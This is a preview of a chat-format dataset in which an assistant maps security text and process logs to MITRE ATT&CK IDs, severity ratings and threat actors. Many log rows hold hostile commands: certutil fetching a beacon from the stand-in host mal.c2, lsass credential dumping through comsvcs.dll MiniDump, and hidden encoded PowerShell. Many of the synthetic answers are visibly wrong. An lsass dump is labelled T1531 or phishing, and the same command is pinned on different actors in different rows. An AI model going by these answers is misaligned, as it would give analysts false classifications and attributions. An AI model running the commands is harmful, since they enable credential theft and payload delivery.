messages
listlengths
2
2
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Smoke Loader deobfuscates its code.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process.", "role": "user" }, { "content": "{\"tactic...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Gamaredon Group has collected files from infected systems and uploaded them to a C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.109.170.19", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0003\"], \"techniq...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1308 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.46.237.23", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0009...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: DropBook has used legitimate web services to exfiltrate data.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1567\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.9.135.181", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0009\", \"TA00...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.129.173.235", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-CSIAX2J34I)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Reconnaissance", "role": "user" }, { "content":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-88U2NDOV45)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.4.28.216", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0003\", \"TA0043\"], ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.97.245.50", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA00...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for newly executed processes when removable media is mounted.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0010\"], \"techniques\": [\"T1052\", \"T1092\"]}", "role": "assis...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: objectClass=trustedDomain", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-D0M1BS8DQI)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection, Privilege Escalation, Lateral Movement", "role": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-NCF5U0MFTF)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Initial Access, Reconnaissance", "role": "user" },...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 552 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.39.127.205", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1071.001...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-YZVU0W9C87)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Command and Control", "role": "user" }, { "cont...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 572 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: WellMess can execute command line scripts received from C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3528 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-9K7EL48G8A)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Lateral Movement, Discovery", "role": "user" }, { "content":...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Diavol can collect the username from a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SILENTTRINITY can bypass ScriptBlock logging to execute unmanaged PowerShell code from memory.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.003\", \"T1562\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Operation Wocao has created services on remote systems for execution purposes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", \"T1569\"]}", "role": "assistant"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.001\"]}", "role": "a...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.87.228.137", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0003\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-0YTHV087P2)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Command and Control, Initial Access", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-PD15BQK8CA)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.79.5.149", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0004\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3706 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Babuk has the ability to enumerate network shares.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.94.161.239", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0005\", \"TA0003...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.144.10.41", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techn...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-QSUFHHT72J)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Impact, Initial Access", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands).", "role": "user" }, { "con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2259 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.35.112.223", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2145 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.195.76.25", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1566.001...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.58.97.160", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0040\", \"TA0005...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-4NAWHS3RS1)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-U7L2LTRGMZ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Hi...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: KEYMARBLE has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-IB9XBSOEKG)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Persistence, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-1RA590STBG)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Persistence", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-ZW65CIGVCC)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control, Initial Access, Persistence", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: These credentials are used with PsExec and Windows Management Instrumentation to help the malware propagate itself across a network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2781 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.168.78.199", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0005\", \"TA0006\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: T9000 encrypts collected data using a single byte XOR key.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560.003\", \"T1560\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3872 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-H49ZGNKAJV)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Credential Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Indirect Code Execution Through INF and SCT This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-H6AH68TXVL)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Persistence, Discovery", "role": "user" }, { "c...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.26.140.113", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0043\", \"TA0040\"]...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3442 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.8.98.72", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1531\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-J2BBHMW6PZ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Privilege Escalation, Lateral Movement", "role": "u...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-ORA4C8AI1U)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Privilege Escalation, Defense Evasion", "role": "user" }, { "cont...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1682 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.167.140.253", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.3.96.5", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0011\", \"TA0002\"], ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.179.84.146", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-68PQ8DCYFE)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Reconnaissance, Credential Access", "role": "user" }, ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.13.170.219", "role": "user" }, { "content": "{\"tactics\": [\"TA0009...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: TA505 has also run net group /domain.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-5XZUA4N0DX)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Persistence", "role": "user" }, { "content": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cyclops Blink has the ability to use the Linux API function utime to change the timestamps of modified firmware update images.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\":...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Impacket's wmiexec module can be used to execute commands through WMI.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-PUBOSGFWDJ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Command and Control", "role": "user" }, { "content":...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: njRAT can create, delete, or modify a specified Registry key or value.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1112\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may compromise third-party DNS servers that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1584.002\", \"T1584\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-00TKBVSOTW)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration, Defense Evasion, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-1B4BZAOAEQ)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.180.33.100", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0001\"], \"tech...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-695T04BD9Z)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what  commands the C2 wishes to run by issuing a request to the following URL:http://<c2 domain>/what?<hex(Envir...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-DK92OEGY9G)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Persistence, Execution", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3637 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1683 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-ESNN4M23J4)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Lateral Movement, Execution", "role": "user" },...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-7G22NRDUHE)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Reconnaissance, Collection", "role": "user" ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Some InnaputRAT variants create a new Windows service to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T1543\"]}", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1566 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.163.7.246", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1566...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.14.249.239", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0043\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 806 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.69.55.36", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.188.214.180", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T10...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-LCZL930QWE)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severit...